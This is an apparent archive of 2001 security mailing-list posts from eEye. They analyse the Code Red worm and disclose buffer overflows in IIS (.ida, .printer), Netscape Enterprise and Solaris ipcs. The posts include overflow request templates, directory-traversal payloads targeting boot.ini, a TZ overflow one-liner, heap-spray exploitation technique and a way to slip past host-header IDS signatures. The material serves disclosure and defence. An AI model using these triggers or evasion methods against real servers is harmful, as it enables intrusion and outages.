CRv2, but each thread in the worm has a mildly different seed.

seed = threadcount(based on 1) * 50F0668D;

The ipselection process in CRv1 is a simple sequence generator. This caused
the early sequences that we noticed and refered to in our (eEye's) initital
warning advisory:

ip = (ip * 0x0CF3383) + 0x76BFE53;

The ipselection process in CRs2 is signifigantly more complex.  It takes use
of time and a whole lot more input operations.  In the following  secmsec is
the DWORD pair of seconds and mseconds returned from GetSystemTime

ip = (ip + secmsec*secmsec*0x0CD59E3 +  secmsec*0x1E1B9) * 0x0CF3383 +

Other Details:
Coincidentally, if this isn't general public knowledge, the worm is smart
enough to avoid attacking the 127.x.x.x and 224.x.x.x subnets using the
following logic after setting the ip.
if( (ip & 0xFF == 0x7f) || (ip & 0xFF == 0xE0) )ip +=0x20DA9;

the Hacked Page:
The second difference between CRv1 and CRv2 is that CRv2 does not deface the
webpage of an infected system.  It does this by having 12 bytes different
from CRv1.

When TcpSockSend is hooked(this still happens), CRv2 points this to a basic
redirect that performs harmless actions and returns without actually
changing any content. Crv1 pointed to a replacement, CRv2 points to
basically a donothing function.

what is happeinging is that the label "PADDING_BYTES" actually is padding
bytes in CRv1(the code does not disassemble to any sane code).

We've used ida's data feature to show the "padding data" as dwords(instead
of a bunch of bytes)

CD4 - EB F8jmp short near ptr
CD6 - 22 6E 84 32   PADDING_BYTES   dd 32846E22h
CDA - 03 75 B3 CAdd 0CAB37503h
CDE - 5A 04 56 34 

RE: Full analysis of the .ida "Code Red" worm.

2001-07-19 Thread Marc Maiffret

You basically just summed up what I was writing in an eMail... As far as
things look right now... will remain standing upright because
they blackholed the IP address that use to map to it which was the right
thing to do and kept this from turning into a much bigger problem then it
already is.

This of course does not by any means the worm is done. Hopefully enough
people are talking and administrators are listening and installing patches
right away.

as a side note... some people asked about why the worm has "slowed down" on
infecting and thats because the worm was designed to do that... to stop
infecting and start attacking an IP address that use to point to

This whole worm process that we have been going through will basically start
from scratch and run its course again when the 1st of next month comes

Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9538 - Network Security Scanner - Network Traffic Analyzer - Web Application Firewall

| -Original Message-
| From: Ryan Russell [mailto:[EMAIL PROTECTED]]
| Sent: Thursday, July 19, 2001 6:36 PM
| To: Laurence Hand
| Cc: Marc Maiffret; BUGTRAQ
| Subject: Re: Full analysis of the .ida "Code Red" worm.
| On Thu, 19 Jul 2001, Laurence Hand wrote:
| >
| > I know MS watches this list, so I hope they will be checking their
| > servers before this starts the DDOS tomorrow.
| >
| I believe the DDoS started an hour and a half ago, at 5:00 PDT (0:00 UTC,
| the next day).  I was getting 5-10 attempts an hour, and I've had 0
| since 4:43:29 PDT.
| Folks will notice that is still accessible.  The worm
| authors only put in one IP address, the one for  BBN
| (who appears to be the provider for, according to my
| tracert) has blocked that single IP address at their peering points.  So
| is still running just fine.
| Presumably, used to be RR DNS between the two.  Now,
| resolves to just, and it has a TTL of
| only 872.
| For a relatively clever worm, the author sure screwed up his target list.
| Whoops.
|   Ryan

RE: 'Code Red' does not seem to be scanning for IIS

2001-07-19 Thread Marc Maiffret

the worm just tries port 80 on ip's. doesnt care if its IIS or not.

also as for the ip seed thing... we have heard reports there is a variant
worm that is doing truly random IP addresses. We dont have any more info on
that though.

Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9538 - Network Security Scanner - Network Traffic Analyzer - Stop known and unknown IIS vulnerabilities

|-Original Message-
|From: Mike Brockman [mailto:[EMAIL PROTECTED]]
|Sent: Thursday, July 19, 2001 9:33 PM
|Subject: 'Code Red' does not seem to be scanning for IIS
|>From what i read about the 'Code Red'-worm, it was supposed to be scanning
|for IIS-servers. It obviously is'nt, i believe it tries to infect
|everything they find on port 80, or something as simple as that.
|About three to four days ago, i started to get those default.ida-GET's in
|my Apache-logs. I shut down the server as fast as i could, and checked for
|outgoing connections from my computer, and then did some research.
|I was told that it was an IIS-worm, and that it could'nt affect
|Apache-servers, so i was safe. I turned the server back on, and from that
|day i have received forty-one attempts.
|How can this be? Why am i getting so few attempts, if it is as eEye says
|-- that every worm-instance has the same seed?
|I should be getting tons and tons of tries, if the worm has been around
|for this long. Or is it that my IP is high up in the "sequence", and not
|many comes that far? If that is the case, the number should be increasing
|fast in the near future, right?
|I'll come back with a report in a week or so.
| m'name be mike brockman! jeeh!

Update to "Code Red" Worm. Its a date bomb, not time.

2001-07-19 Thread Marc Maiffret

Thanks to Eric from Symantec for tossing us a note about the worm being Date
based and not Time based.

We made an error in our last analysis and said the worm would start
attacking based on a certain time. In reality its based on a
date (the 20th UTC) which is tomorrow.

If the worm infects your system between the 1st and the 19th it will attempt
to deface the infected servers web page or try to propogate itself to other
systems. On the 20th all infected threads will attempt to attack This seems to continue until the worm is removed from
the infected system.

Any new infection that happens between the 20th and 28th will most likely be
someone "hand infecting" your system as all other worms should be attacking If for some reason you are infected between the 20th and the
28th then the worm will begin attacking without trying to
infect other systems. This attack will continue indefinitly.

The following are rough numbers, but we felt that it was important to
illustrate the affects this worm can _possibly_ have.

The worm has a timeline like this:

day of the month:
1-19: infect other hosts using the worm
20-27: attack forever
28-end of month: eternal sleep

Presumably, this could restart at any point in a new month again.

Also, some stats for the attack:

Each infection has 100 threads
Each thread is going to send about 100k, a byte at a time, which means you
have a (40 for ip + 1 for each byte) which means you have 4.1 megs of data
per thread
100 threads * 4.1megs = 410 Megabytes
This will be repeated again every 4.5 hours or so

Remember, each host can be infected multiple times, meaning that a single
host can send 410MB * # of infections.

We have had reports between 15 thousand and 196 thousand unique hosts
infected with the "Code Red" worm. However, there has been cross infection
and we have heard reports of at least 300+ thousand infections/instances
(machines with multiple infections etc..) of this worm.

If there are 300 thousand infections then that means you have (300,000 * 410
megabytes) that is going to be attempted to be flooded against every 4 and a half hours. If this is true and the worm "works
as advertised" then the fact that goes offline is only the
begining of what _can_ possibly happen...

I am actually writing this part of the eMail about 45 minutes after the
first part because our Internet connection here in california has been going
up and down. We have also heard reports of internet connectivity going down
in parts of northern california and new york.

eEye Digital Security
F.949.349.9538 - Network Security Scanner - Network Traffic Analyzer - Stop known and unknown IIS vulnerabilities

Full analysis of the .ida "Code Red" worm.

2001-07-18 Thread Marc Maiffret

The following is a detailed analysis of the "Code Red" .ida worm that we
reported on July 17th 2001.

This analysis was performed by Ryan Permeh and Marc Maiffret of eEye Digital
Security. The disassembly (complete with comments) was done by Ryan
"Shellcode Ninja" Permeh.

Table of Contents
1. Introduction
2. Explanation
3. Commentary
4. Deep Analysis
5. Conclusion
6. Appendix
7. Credits

You can get a copy of this analysis, commented disassembly, full IDA
database, and binary of worm from


On Friday July 13th we received packet logs and information from 2 network
administrators that were experiencing large amounts of attacks targeting the
recent .ida vulnerability that eEye Digital Security discovered
( on June 18,
2001. After reviewing the logs sent to us we determined that in fact someone
had released a worm into the Internet that was spreading rapidly through IIS
web servers.

The full analysis of the .ida "Code Red" worm has provided numerous new
details as to the functionality and method of propagation of this worm. For
instance this worms purpose ultimately seems to be to perform a denial of
service attack against Also it has been found that only
US English Windows NT/2000 systems will show the defaced ("Hacked by Chinese
!") web page.

We've designated this the .ida "Code Red" worm, because part of the worm is
designed to deface web pages with the text "Hacked by Chinese" and also
because code red mountain dew was the only thing that kept us awake all last
night to be able to disassemble this exploit even further.

As stated earlier the .ida "Code Red" worm is spreading throughout IIS web
servers on the Internet via the .ida buffer overflow attack that was
published weeks ago.

The following are the steps that the worm takes once it has infected a
vulnerable web server.

1. Setup initial worm environment on infected system.
2. Setup a 100 threads of the worm
3. The first 99 threads are used to spread the worm (infect other web
-The worm spreads itself by creating a sequence of random IP addresses.
However, the worm's randomization of IP addresses to attack is not all
together random. In fact there seems to be a static seed that the worm uses
when generating new IP addresses to try to attack. Therefore every computer
infected by this worm is going to go through the same list of random IP
addresses to try to infect. The "problem" with that is that the worm is
going to end up reinfecting systems and also end up crossing traffic back
and forth between hosts to end up creating a denial of service type affect
because of the amount of data that will be transferred between all the IP
addresses in the sequence of random IP addresses. The worm could have done
truly random IP generation and that would have allowed it to infect a lot
more systems a lot faster. We are not sure why that was not done but a
friend of ours did pose an interesting idea... If the person who wrote this
worm owned an IP address that was one of the first hundred or thousand
etc... to be scanned then they could setup a sniffer and anytime and IP
address tried to connect to port 80 on their IP address they would know that
the IP address that connected to them was infected with the worm and they
would therefore be able to create a list of the majority of systems that
were infected by this worm.
4. The 100th thread checks to see if it is running on a English (US) Windows
NT/2000 system.
-If the infected system is found to be a English (US) system then the worm
will proceed to deface the infected systems website. That means... the local
web servers web page will be changed to a message that says Welcome to !, Hacked By Chinese!. This hacked web page message will
stay "live" on the web server for 10 hours and then disappear and never
appear again unless the infected system is re-infected by another host.
-If the system is not a English (US) Windows NT/2000 system then the 100th
worm thread is also used to infect other systems.
5. Each worm thread checks for c:\notworm
-If the file c:\notworm is found, the worm goes dormant.
-If the file is not found then each thread will continue to attempt to
infect more systems.
6. Each worm thread will now check the infected computers time.
-If the time is between 20:00 UTC and 23:59 UTC then the worm will proceed
to use this thread to attack The attack consists of the
infected system sending 100k bytes of data to port 80 of
therefore potentially performing a denial of service attack against
-If the time is below 20:00 UTC then this worm thread will try to find and

RE: IIS5 .idq exploit

2001-07-18 Thread Marc Maiffret

SANS is a bit behind the curve if they have just announced this today as
this has been around for a few weeks now. First on some geocities website,
then on packetstorm, then finally on the win2ksec mailing list (and a few

As a side note... a few people have confused the .ida worm with hsj's
exploit... hsj's exploit is _not_ a worm. Just wanted to clear that up for
the handful of people I have seen misreporting things.

Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9538 - Network Security Scanner - Network Traffic Analyzer - Stop known and unknown IIS vulnerabilities

|-Original Message-
|From: Jason Staples - CNW [mailto:[EMAIL PROTECTED]]
|Sent: Wednesday, July 18, 2001 6:14 PM
|Subject: IIS5 .idq exploit
|SANS accounced its availability today, and after spending a bit of time
|searching, I finally found the new IIS5 exploit.
|| Jason Staples  [EMAIL PROTECTED] | /"\|
|| Network EngineerSecurity Analyst | \ /  ASCII Ribbon Campaign |
||  |  XAgainst  HTML E-Mail |
|| Connect Northwest Internet Services. | / \ |

Initial analysis of the .ida "Code Red" Worm

2001-07-17 Thread Marc Maiffret

The following information was researched by Ryan Permeh ([EMAIL PROTECTED] and
Marc Maiffret ([EMAIL PROTECTED] of eEye Digital Security.
We would like to specially thank Matthew Asham of Left Coast Systems Corp
and Ken Eichman of Chemical Abstracts Service for providing us with logs and
needed data to make this analysis possible.


On Friday July 13th we received packet logs and information from 2 network
administrators that were experiencing large amounts of attacks targeting the
recent .ida vulnerability that eEye Digital Security discovered
( on June 18,

>From the first analysis of the logs that were sent to us we were able to
deduce that in fact it looked as if someone had released a worm for the .ida
vulnerability. Within the logs we could see connection attempts from over 5
thousand IIS 5 web servers targeting various other IIS web server and
sending a .ida exploit to each of them. Evidence also showed that
compromised hosts were being used to attack other hosts.

We've designated this the .ida "Code Red" worm, because part of the worm is
designed to deface webpages with the text "Hacked by Chinese" and also
because code red mountain dew was the only thing that kept us awake all last
night to be able to disassemble this exploit.

Note: Details are going to be short for now. We plan on releasing a full
analysis of the worm but felt that it was important to get this message out
ASAP as this worm is starting to affect a lot of people.

The standard injection vector is a exploit that uses the .ida buffer
overflow to execute code (as SYSTEM) on vulnerable remote systems.

The worm performs the following on infected systems:
* Spawns 100 threads which are used to scan for new IIS web servers to
* Checks for the existence of c:\notworm and if it is found then it does not
try to propagate itself to other hosts.
* Defaces web pages with the message:
HELLO!Welcome to !Hacked
By Chinese!


Note: Again this is a quick brief analysis, more detail will follow.

Upon infection the infected host will spawn 100 threads in a loop. This loop
checks for the existence of c:\notworm and if the file does not exist then
the worm will proceed to start scanning for vulnerable servers to infect.

The worm does scan for random IP addresses. However, the worm uses the same
seed for "randomization" of IP addresses. This means that each new infected
host will start at the same IP and continue scanning further down the same
track of IP's as every other infected host. The ramifications of this are
severe because this means that hosts early in this "randomized" IP sequence
will be hit over and over as new hosts are infected. This creates the
potential for a denial of service against early IP addresses in the
sequence. Also, evidence has proved that hosts can be infected multiple
times therefore creating a drain on system resources. However, normal worm
operation seems to have a cut off point as to how many times a host will be
re-infected. Early analysis seems to suggest that the worm has a limit of 3
reinfections however that may have just been "by chance" in our test

Other in house tests of the infections have shown that internal thread rate
limiting seems to be broken in certain situations. Which means that some
infected systems will continue to spawn new threads until system resources
become so low that the entire web server computer crashes or becomes

We will be releasing a full detailed analysis, complete with disassembled
worm code and comments within the code.

We have had reports from a few network administrators that their IDS systems
have seen this .ida attack originating from over 5 thousand unique source
addresses within a 3 day time span.

Hosts early in the IP sequence will be hit with a traffic based denial of
service and those hosts vulnerable to this worm will most likely grind to a

How to secure your system from this .ida attack
Microsof patch for this .ida vulnerability

eEye Digital Security Advisory

The following is part of the packet data that is sent for this .ida "Code
Red" worm attack:


You can set your IDS to monitor for this to be able to see if yo


2001-06-28 Thread Marc Maiffret

When we were researching the .ida exploit we came across this _potential_
bug and we therefore fixed the problem before the Microsoft security
advisory was released.

We also notified all of our customers about the new version of SecureIIS and
that they _needed_ to upgrade to the latest version (at the time that was
1.1) because we updated some of our technologies within SecureIIS.

So in the end people that were using SecureIIS were actually protected from
the .ida vulnerability days before the vulnerability even was released to
any public forum etc...

In the future if you find what you believe to be a bug then I would suggest
contacting us first so that we can give you the needed information (I.E. 3
or so new versions of SecureIIS have been released since 1.0.6) and if there
is a valid problem then we can fix that problem. This however is not an


Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9538 - Network Security Scanner - Network Traffic Analyzer - Stop known and unknown IIS vulnerabilities

|-- Forwarded message --
|Date: Wed, 27 Jun 2001 00:56:48 +0200
|From: Crussaider <[EMAIL PROTECTED]>
|Hi all,
|after some testing I noticed that SecureIIS 1.0.6 does not
|protect IIS 5.0 from ISAPI DoS attack. In the attachment is
|isapi-dos2.c and isapi.exe cygwin compilation.
|After attack with this exploit IIS is down. In SecureIIS i
|have very restrictive polices, but anyway it did not manage to
|protect it from this kind of attack.
|To try isapi.exe you must have cygwin1.dll
|Does anyone have similar experience?
|Best regards,
| Crussaider  mailto:[EMAIL PROTECTED]

All versions of Microsoft Internet Information Services, Remote buffer overflow (SYSTEM Level Access)

2001-06-18 Thread Marc Maiffret

All versions of Microsoft Internet Information Services, Remote buffer
overflow (SYSTEM Level Access)

Release Date:
June 18, 2001

High (Remote SYSTEM level code execution)

Systems Affected:
Microsoft Windows NT 4.0 Internet Information Services 4.0
Microsoft Windows 2000 Internet Information Services 5.0
Microsoft Windows XP beta Internet Information Services 6.0 beta

There exists a remote buffer overflow vulnerability in all versions of
Microsoft Internet Information Services (IIS) Web server software.

The vulnerability lies within the code that allows a Web server to interact
with Microsoft Indexing Service functionality. The vulnerable Indexing
Service ISAPI filter is installed by default on all versions of IIS. The
problem lies in the fact that the .ida (Indexing Service) ISAPI filter does
not perform proper "bounds checking" on user inputted buffers and therefore
is susceptible to a buffer overflow attack.

Attackers that leverage the vulnerability can, from a remote location, gain
full SYSTEM level access to any server that is running a default
installation of Windows NT 4.0, Windows 2000, or Windows XP and using
Microsoft’s IIS Web server software. With system-level access, an attacker
can perform any desired action, including installing and running programs,
manipulating Web server databases, adding, changing or deleting files and
Web pages, and more.

The Discovery:
Riley Hassell was at it again one day working to further advance eEye's CHAM
(Common Hacking Attack Methods) technology so that Retina could better
search for unknown vulnerabilities in software and so that SecureIIS could
better protect from unknown IIS vulnerabilities.

After a few hours of running some custom CHAM auditing code one of our Web
servers in our lab eventually came to a halt as the IIS Web server process
had suddenly died.

We investigated the vulnerability further and found that the .ida ISAPI
filter was susceptible to a typical buffer overflow attack.

GET /NULL.ida?[buffer]=X HTTP/1.1
Host: werd

Where [buffer] is aprox. 240 bytes.

The Exploit, as taught by Ryan "Overflow Ninja" Permeh:

This buffer overflows in a wide character transformation operation. It takes
the ASCII (1 byte per char) input buffer and turns it into a wide
char/unicode string (2 bytes per char) byte string. For instance, a string
like  gets transformed into \0A\0A\0A\0A. In this transformation, buffer
lengths are not checked and this can be used to cause EIP to be overwritten.

This sounds like any normal overflow to date, however there are a few
sticking points in doing anything useful with this. First, you transform 2
bytes into 4, 2 of which you have no control over. This would be a bad
situation, but not impossible to exploit. However, the 2 bytes that you do
not have control over happen to be nulls. Basically, we need to take this 2
byte string and somehow get it to point to our code. Traditionally, we use
our overwritten EIP to jump to a call esp, or jmp esp, jumping back to code
we have positioned on the stack to implement whatever it is our shellcode
would like to do. In this case, however, there is a problem.

GET /a.ida?[Ax240]=x HTTP/1.0

The above example overwrites EIP with 0x00410041. Again, traditionally, we
insert our shellcode in the same buffer we overflow, however we run into the
problem that then our code would also face the same expansion that our EIP
bytes face. This makes writing shellcode a horrible pain. There are two
methods of doing this:

1. custom shellcode: It might be possible to write shellcode that works fine
with NULL byes every other byte. It would probably have to be very simple,
but this could be possible.

2. encode: You could probably write a decoder that takes a string of 0x0041
and rewrites it on the stack into actual single byte code. This would have
to be written completely in 0x00bb opcodes, most likely a challenge in
itself (similar to the above custom shellcode, but only a decoder would need
to be written).

This would, of course only be possible if we could find a point in memory
that we could reach using only 0x00aa00bb. This gives us only about 65k
spots in memory to look for jump bytes, a pretty dismal situation.

Exploiting Wide Char Strings In Practice
We got lucky using this method. We were basically limited to a very very
small range of memory in which to find jump bytes. We thought we were losing
the battle until we realized that IIS/ISAPI uses 0x00aabbcc as its memory
range for allocated heap. We developed a spray technique in an attempt to
push enough data into the heap so that the bytes we require will be there
when we need to jump to them.

For instance, in Windows 2000 Service Pack 1, we noticed that we had request
bytes at around 0x0042deaa. Since the closest we could get to this was
0x00430001 (by overflowing with C%01 at the end of our overflow string. This
offered us an intriguing possibility -- perhaps we could push more stuff
into a reques

IDS's, host: headers, and .printer ISAPI overflow as an example

2001-06-10 Thread Marc Maiffret

A lot of Intrusion Detection Systems are only look for Host: strings when
dealing with web server attacks that do "bad things" with the Host: field.
An example of that would be the .printer ISAPI overflow that eEye released a
few weeks or so ago.

We have seen three distinct patterns in signatures attempting to detect this
1. Block/alert all .printer attacks: this causes all .printer attacks to be
signaled as attacks, potentially causing many false positives in
environments where it is used. However, I would agree that .printer is not
recommended at all for public web servers.
2. Blocking shell code signatures: This is only as effective as the sigs
are. Writing shell code to avoid these sigs completely can typically be done
in a matter of a few minutes.
3. Those that deal with Host: headers. This seems to be the best targeting
for this attack sig, but all that we have seen are flawed in their
implementation, and here's how to walk past them:

The overflow, when released, would have a client request that looked like
the following:
GET /anything.printer HTTP/1.1
Host: overflow

Some IDS's looking for Host: overflows were basically only looking for Host:

However, the above attack can also be represented as:

GET http://overflow/anything.printer HTTP/1.0

To IIS (and a lot of other web servers) both requests are valid and both
requests contain valid host header information. IIS will process both of
them in the same manner. So if an attacker changes any of the various
exploit programs on the net to place the overflow buffer in http://%s/
instead of Host: %s then that exploit will basically sneak past certain
IDS's that are only focusing on Host: data instead of doing proper host
header checking.

just a heads up

Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9538 - Like Intrusion Detection, except it stops the
attackers of today, yesterday. - Network Traffic Analyzer - Stop known and unknown IIS web server attacks

RE: ASLabs-2001-01: Multiple Security Problems in eEye SecureIIS

2001-05-19 Thread Marc Maiffret

You will find our response and fix information below. To download the latest
version of SecureIIS (v.1.0.4) then visit the SecureIIS website at,

|Vendor: eEye (
|Product: SecureIIS

|Product description (from
|SecureIIS protects Microsoft IIS (Internet Information Services) Web
|servers from known and unknown attacks. SecureIIS wraps around IIS and
|works within it, verifying and analyzing incoming and outgoing Web
|server data for any possible security breaches. It combines the best
|features of Intrusion Detection Systems and Conventional Network
|Firewalls all into one, and it is custom tailored to your Web server.
|Release Date: May 17th, 2001.
|Authors: C-3P0 and R2-D2.

|1. Keyword checking - SecureIIS promises "By checking for common

| GET /whatever.script?user=%41DMIN HTTP/1.0
| POST /whatever.script HTTP/1.0
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 10
| user=ADMIN

We have updated SecureIIS to properly handle various web encoding methods
including unicode and hex (%) style encoding.

We have also updated SecureIIS to perform keyword checking on POST data.

|2. Directory traversal - SecureIIS promises "In certain situations,

| GET /whatever.script?file=/%2e%2e/%2e%2e/boot.ini HTTP/1.0
| POST /whatever.script HTTP/1.0
| Content-Type: application/x-www-form-urlencoded
| Content-Length: 20
| page=/../../boot.ini

The directory traversal checking bug described above was fixed when the
keyword and post bugs were fixed. See section 1.

|3. Buffer Overflows - For HTTP headers, SecureIIS promises (from

| GET / HTTP/1.0
| Host: [500 x random a-z charachers]

We have enabled individual header length checking in SecureIIS 1.0.4.

|4. Buffer Overflows in SecureIIS - if the request is large (several

SecureIIS did not suffer from a buffer overflow attack. There were a few
bugs though that might have lead you to believe so. These bugs were actually
fixed in SecureIIS version 1.0.3 which was posted to our website on Thurs.
May 17th. The problem you were seeing was due to some issues with how IIS
itself allocates heap memory.

|Workaround: No workaround is known.

We first found out about this vulnerability from reading an advisory that
was posted (Fri 5/18/2001 10:49AM) by ASLabs (namely C-3P0 and R2-D2) to
various security mailing lists. While we wish they would have contacted us
in advance, we do appreciate bug reports and vulnerability research because
it helps us to create better products. As stated earlier we have since
posted (Sat 5/19/2001 12:27am) a new version of SecureIIS (version 1.0.4)
that fixes the bugs talked about in C-3PO and R2-D2's advisory.

These bugs were valid and therefore were dealt with at a top priority. The
bugs that were posted were most likely to affect third party apps rather
than IIS specific vulnerabilities. Basically this means that registered
users of SecureIIS have been protected from various IIS specific
vulnerabilities (unicode,nsfocus-decodebug,.printer,etc...) from the very
first beta of SecureIIS.

The following is a list of some of the new features/changes in SecureIIS:
Maximum POST Query Length Allowed
Processing of individual header length fields
High Bit Shellcode Protection in POST Data
Full decoding of all query strings (unicode and hex data)
Keyword filtering for POST data
Protect against Directory Traversal Exploits in Query String and POST Data

Once again, being that eEye itself does vulnerability research, we
definitely encourage vulnerability research from other organizations as it
helps to make products more secure. If anyone should find any other related
bugs within our software (SecureIIS, Retina, Iris) then please do not
hesitate to eMail [EMAIL PROTECTED] or myself so that we can work with you to
fix the bugs ASAP.


Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9538 - Network Security Scanner - Network Traffic Analyzer - Web Application Firewall

iPlanet - Netscape Enterprise Web Publisher Buffer Overflow

2001-05-16 Thread Marc Maiffret

iPlanet – Netscape Enterprise Web Publisher Buffer Overflow

Release Date:
May 11, 2001

High (Remote SYSTEM level code execution)

Systems Affected:
Netscape Enterprise 4.1 and prior versions.

The Web Publisher feature in Netscape Enterprise 4.1 is vulnerable to a
buffer overflow. By sending a large buffer containing executable code and a
new Instruction Pointer, an attacker is able to gain remote system shell
access to the vulnerable server.

The overflow itself exists in Publishers handling of the URI (Uniform
Resource Identifier). By specifying GETPROPERTIES, GETATTRIBUTENAMES, or any
other one of the publisher specific methods, we can pass data into
vulnerable section of the server and exploit the vulnerability.

C:\>telnet 80
Connecting To connected.
Host: Hostname

Where (buffer) is 2000 characters.

The Exploit:
We have not had time yet to produce a proof of concept exploit, however
expect one soon.

Vendor Status:
Quote from iPlanet's development team: "The security & stability of
iPlanet's customer's environments is one of our paramount concerns. To
ensure the stability of our customer's environments iPlanet has made
available an NSAPI patch that can be applied to iPlanet Web Server,
Enterprise Edition."

The NSAPI patch is available at: .
This issue will also be addressed by the release of iPlanet Web Server,
Enterprise Edition version 4.1 Service Pack 8.

Riley Hassell ([EMAIL PROTECTED])

Related Links:
SecureIIS, Stop known and unknown IIS web server vulnerabilities.

Retina, The Network Security Scanner.

Tool for an amazing new album. NiN for another beautiful single.

Copyright (c) 1998-2001 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail [EMAIL PROTECTED] for

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Please send suggestions, updates, and comments to:

eEye Digital Security

Windows 2000 .printer remote overflow proof of concept exploit

2001-05-02 Thread Marc Maiffret

We have updated our advisory
( to link to a
proof of concept exploit for our Windows 2000 .printer ISAPI overflow
vulnerability. The proof of concept code, when run against a vulnerable
Win2k system, will create a file called on the root of
drive c.

If you have a Windows 2000 web server then please install the Microsoft
security patch ASAP. This proof of concept exploit is not to be used as a
method of testing to see if your vulnerable or not. It has been published as
a way to learn more about what is going on with specific technical details
pertaining to this flaw. If you have not installed the Microsoft security
patch then you are most likely vulnerable and need to patch your system

As a side note... eEye Digital Security was contacted by a few of the rather
lage IDS vendors yesterday looking to get a copy of the example exploit so
that they could create a signature for their IDS. Instead of replying to
each of them individualy we thought we would do so here and that way other
IDS vendors will have the "heads up."

Creating an IDS signature that looks for a request of GET /NULL.printer
HTTP/1.0\nHost: eeyeoverflowstring\n\n is not going to really do much for
you. While you might catch our specific example exploit you will miss any
other exploits that have been developed and are "in the wild." In order to
correctly monitor for people launching attacks against the .printer ISAPI
filter you should be looking for any get requests of .printer and a large
(you'll have to track down the buffer range yourself, around 420) Host:
header. That is one of the ways that SecureIIS is able to generically stop
the attack (simply speaking of course).

Anyways, have fun reading and learning from the example exploit. Ryan Permeh
([EMAIL PROTECTED]) has done a great job with it.

Also... There has been some talk on various mailing lists about methods of
detecting if the .printer ISAPI filter is installed on a remote server. Now
some people suggested opening IE and then typing in which should then return an error
like "Error in web printer install." However by default IE shows "friendly"
HTTP error messages and is not going to show you the ISAPI error message. So
either turn off friendly HTTP error messages or use telnet (recommended).

Marc Maiffret
Chief Hacking Officer
eEye Digital Security
F.949.349.9538 - Network Security Scanner - Network Traffic Analyzer - Web Application Firewall

Windows 2000 IIS 5.0 Remote buffer overflow vulnerability (Remote SYSTEM Level Access)

2001-05-01 Thread Marc Maiffret

Windows 2000 IIS 5.0 Remote buffer overflow vulnerability (Remote SYSTEM
Level Access)

Release Date:
May 01, 2001

High (Remote SYSTEM level code execution)

Systems Affected:
Microsoft Windows 2000 Internet Information Services 5.0
Microsoft Windows 2000 Internet Information Services 5.0 + Service Pack 1

A wise man once said, "When a single exploit is released, it's a good hack.
When you are the first to hack each successive version of a product run on
millions of computers all over the internet, you create a dynasty."

It seems sometimes the greatest discoveries are the ones that are the
hardest to share with the world. Its not about a lack of wanting to tell
everyone but a lack of not knowing exactly how to put it so that peoples
jaws do not drop so fast that their head snaps back as they realize just how
fragile our world is becoming as we slowly push society into the digital
world people only dreamed about years ago. A world in which everything is
being connected and little is being done to shore up the large looming gaps
that are in existance in todays networked systems.

And without further ado... eEye Digital Security Presents, "Remote SYSTEM
level Access to any default Windows 2000 IIS 5.0 web server."

The Discovery:
This bug was first discovered while Riley Hassel, of eEye Digital Security,
was updating Retina's CHAM (Common Hacking Attack Methods) techonology to
look for unknown vulnerabilities within some of the new features that
Windows 2000 IIS 5.0 provides. One of the features that was added to be
audited by CHAM was the .printer ISAPI filter extension. Once the .printer
ISAPI filter was added to the list of ISAPI's to audit, as well as various
aspects of the new Web DAV functionality within IIS, the latest Retina
development code was let loose against a test server in our lab. Within a
matter of minutes a debugger kicked in on inetinfo.exe because of a "buffer
overflow error."

The Explanation:
It turns out the latest development code of Retina was able to find a buffer
overflow within the .printer ISAPI filter (C:\WINNT\System32\msw3prt.dll)
which provides Windows 2000 with support for the Internet Printing Protocol
(IPP) which allows for the web based control of various aspects of networked

The vulnerability arises when a buffer of aprox. 420 bytes is sent within
the HTTP Host: header for a .printer ISAPI request.

GET /NULL.printer HTTP/1.0
Host: [buffer]

Where [buffer] is aprox. 420 characters.

At this point an attacker has sucessfully caused a buffer overflow within
IIS and has overwritten EIP. Now normally the web server would stop
responding once you have "buffer overflowed" it. However, Windows 2000 will
automatically restart the web server if it notices that the web server has
crashed. While the feature is nice to help create a longer period of "up
time" it is actually a feature that makes it easier for remote attacks to
execute code against Windows 2000 IIS 5.0 web servers.

As we stated earlier our overflow is able to overwrite the EIP register with
whatever we want. That basically means we can overwrite EIP with a location
in memory that jumps to our "exploit" code, in memory, and then executes our
code with SYSTEM level access.

The Exploit:
Ryan Permeh, resident shellcode ninja, of eEye Digital Security has created
an example exploit to be used as a "proof of concept." Our proof of concept
exploit will, when run against an IIS 5 web server, create a text document
on the remote server with instructions directing readers to a webpage on that has information on how to patch the system so that the web
server is no longer vulnerable to this flaw. This exploit is to only be
considered a proof of concept exploit and any one with Windows 2000 should
install the Microsoft supplied patch ASAP.

Check back to our website later today as we posted a link to our proof of
concept code.

We would like to note that eEye Digital Security did provide Microsoft with
a working example exploit that when ran against a web server would, in a
matter of a few seconds, bind a cmd.exe command prompt to a port on a remote
IIS 5.0 web server so that a remote attacker could then execute commands
with SYSTEM level access and therefore have full control of the vulnerable

The Log:
Actually there is no log because this vulnerability, like most IIS buffer
overflows, does not go logged. That means some of the largest web servers on
the Internet running Windows 2000 are vulnerable to this attack and when
exploited, there will be no IIS log anywhere that records the attack.

The Fallout:
As with our first remote SYSTEM level exploit for IIS 4.0 2 years ago, the
fallout from this second IIS remote overflow is also rather large. Once
again it does not matter what kind of security systems you have in place,
Firewalls, IDS's, etc.. because all of those systems can be bypassed and
your web server CAN be broken into via this vulnerability. To quote our l

Solaris ipcs vulnerability

2001-04-13 Thread Marc Maiffret

Solaris ipcs vulnerability

Release Date:
April 11, 2001

Systems Affected:
Solaris 7 (x86)
Other versions of Solaris are most likely affected also.

Discovered by:

We have discovered a buffer overflow in the /usr/bin/i86/ipcs utility
provided with Solaris 7. The problem exists in the parsing of the TZ
(TIMEZONE) environment variable. By exploiting this vulnerability an
attacker can achieve local sys group privileges. IPCS is used for gathering
information on active inter-process communication facilities. Exploitation
of this vulnerability would be very difficult, but not impossible.

bash-2.03$ TZ=`perl -e 'print "A"x1035'`
